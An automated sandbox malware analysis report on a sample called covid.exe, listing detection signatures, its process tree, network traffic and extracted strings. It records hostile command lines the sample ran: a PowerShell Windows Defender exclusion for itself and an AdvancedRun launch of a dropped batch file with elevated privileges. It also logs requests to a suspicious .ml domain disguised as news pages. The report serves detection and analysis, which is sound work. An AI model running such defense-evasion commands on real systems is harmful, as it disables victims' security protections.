Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:393947
MD5:99e3b458dee79b33209d39d19692ae08
SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
Infos:

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
    • AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.htmlVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: covid.exeVirustotal: Detection: 40%Perma Link
Source: covid.exeReversingLabs: Detection: 34%
Machine Learning detection for sampleShow sources
Source: covid.exeJoe Sandbox ML: detected
Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.mlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.ml
Source: Joe Sandbox ViewIP Address: 172.67.220.147 172.67.220.147
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.mlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.ml
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknownDNS traffic detected: queries for: mmwrlridbhmibnr.ml
Source: covid.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: covid.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 0000000F.00000002.432355144.0000000002DF8000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: covid.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: covid.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: covid.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: covid.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: covid.exe, 00000000.00000003.236314820.0000000005B22000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6cc8150004891
Source: covid.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: covid.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: covid.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://www.nirsoft.net/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ded/script.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
